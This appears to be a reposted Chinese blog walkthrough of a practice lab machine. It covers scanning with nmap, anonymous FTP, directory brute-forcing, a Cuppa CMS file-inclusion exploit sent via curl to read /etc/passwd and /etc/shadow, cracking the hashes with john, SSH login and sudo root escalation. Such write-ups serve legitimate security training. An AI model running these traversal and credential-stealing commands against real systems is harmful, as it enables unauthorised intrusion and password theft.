首先資訊收集對收集的資訊進行好的記錄與分析,目錄爆破發現檔案管理,訪問目錄,嘗試操作,分析cms的漏洞,目錄猜解,查看檔案利用curl編碼解決報錯,可以查看到passwd檔案然后嘗試查看shadow檔案,利用john進行密碼破解,ssh遠程登錄,sudo -l查看當前用戶都有哪些權限,查看后發現是all,直接創建新的bash或者sh(推薦bash好用真正的權限)隨后就是root權限,該靶機的難度在于對目錄的猜解
資訊收集
nmap -sn 192.168.20.0/24 //掃描網段IP發現靶機

nmap --min-rate 10000 -p- 192.168.20.21 //掃描主機開放埠

nmap -sT -sC -sV -O -p22,21,80,3306 192.168.20.21 //掃描埠開放的服務

nmap --script=vuln -p21,22,80,3306 192.168.20.21 //默認腳本掃描,發現一個檔案管理系統,并且有開放的ftp檔案傳輸協議

分析協議的優先級,服務的優先級選擇一個埠下手,以ftp先開始
嘗試登錄ftp使用匿名用戶,匿名用戶登錄通常是不需要密碼的

賬戶名anonymous,然后密碼輸入回車

登陸后救贖先就是查看匿名用戶所擁有的檔案串列使用ls命令進行查看,將查看的檔案全部都保存到 自己的主機上
使用ls查看檔案串列,使用cd切換目錄使用mget命令將檔案保存到本機的當前檔案夾下

使用cat命令分別查看三個檔案的內容是什么
在這里,第一個檔案內容中他的命名方式有些奇怪,需要注意的一個點是他用的并不是正常的英文字母,而是采用了廣泛的leetspeack進行了編碼,這種方式是為了改變命名沖突的問題https://en.wikipedia.org/wiki/Leet

所以下面所顯示的內容就是WIRES.inc

查看02.txt檔案發現有兩個字符出串,但是類似于加密

用hash-identifier這個去識別一下是哪種加密方式 hash-identifier 01ec2d8fc11c493b25029fb1f47f39ce

對第二個字串進行識別,但是觀察兩個的格式肯定是不一樣的,猜測第二個是base64編碼,進行解密,echo作用是防止發生斷開

解密上面的md5的字串但是沒有實際結果

查看其他兩個檔案:

還有一個

但是文字是翻轉的,用工具翻轉

提示資訊不要在這里做,記住資訊

換其他的方向,因為ftp沒有收集到可以用的資訊
訪問80埠,是一個默認的界面,但是上面提示有檔案系統,所以這里可能有其他的資訊

嘗試進行目錄爆破
gobuster dir -u http://192.168.20.21 -w /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt

但是結果只有這一個看以看,經過一頓思考操作這個沒什么用,但是還是要記筆記收集起來萬一后面會用到的

既然是cms那就搜一下這個cms有沒有什么漏洞
使用kali默認的工具,可以看到是有的:searchsploit cuppa cms

把這個檔案加載到本機當前的路徑,查看檔案的詳細內容
searchsploit cuppa cms -m 25971



可以看到兩個路徑,瀏覽器嘗試訪問,可以看到有顯示資訊
說明一下,url路徑問題,大多數情況下在網站之中都不會將檔案放在他的最初的默認下面,比如不太會放在cuppa下面,所以嘗試訪問的時候去找我們已經訪問到的路徑進行拼接,從低級目錄到高級目錄的拼接,所以會成為下面這樣可以訪問

路徑訪問既然有顯示,接下來就是我們要看到這個檔案的里面是什么內容,使用curl去解碼
html2text是為了是使結果展現的更清晰,根據情況使用,沒有html2text可以根據報錯提示直接下載
可以到這個檔案是可以成功訪問的
curl --data-urlencode urlConfig=../../../../../../../../../etc/passwd http://192.168.20.21/administrator/alerts/alertConfigField.php | html2text

資訊分析
既然我們剛剛訪問到了passwd這個檔案,那么就可以嘗試訪問一下shadow檔案,這兩個檔案的區別在于前者是每個用戶都可以看的,存放的也只是普通用戶的密碼,但是shadow這個檔案下面所存放的是系統用戶的資訊,是否能訪問看網站的安全性
可以看到執行命令后出現兩個很長的加密密碼,這就是需要進行破解的地方(部分圖片)
curl --data-urlencode urlConfig=../../../../../../../../../etc/shadow http://192.168.20.21/administrator/alerts/alertConfigField.php


接下來破解這兩個密碼,把這兩個密碼復制,使用vim編輯器生成檔案hash(隨意)
john hash
這個截圖是因為已經破解過了,看提示展示某個檔案就行

可以看到兩個密碼一個是computer的一個是www-data的,肯定是用計算機的去嘗試ssh登錄了(前面的是用戶名后面的是密碼,這是靶機真實情況萬一有,倆都試試,但是先試一個,看看有沒有什么特權,而不是試試能不能登錄)
john --show hash

提權
登錄成功,初級shell拿到,接下來就是提權

查看當前用戶資訊

查看當前用戶sudo的權限是什么樣的
sudo -l //標記位置為所有權限,那就是這個用戶可以直接提權到root

使用sudo /bin/bash 或者 sudo /bin/sh都可以執行此處的提權,本意就是創建一個新的行程?然后將這個權限是執行的sudo,又因為當前的這個用戶是ALL權限,所以直接是root(我也有點這個原理上的疑惑,求證后會更改)_


最后切換到root下,截一張大圖這里

轉載請註明出處,本文鏈接:https://www.uj5u.com/qita/548365.html
標籤:其他
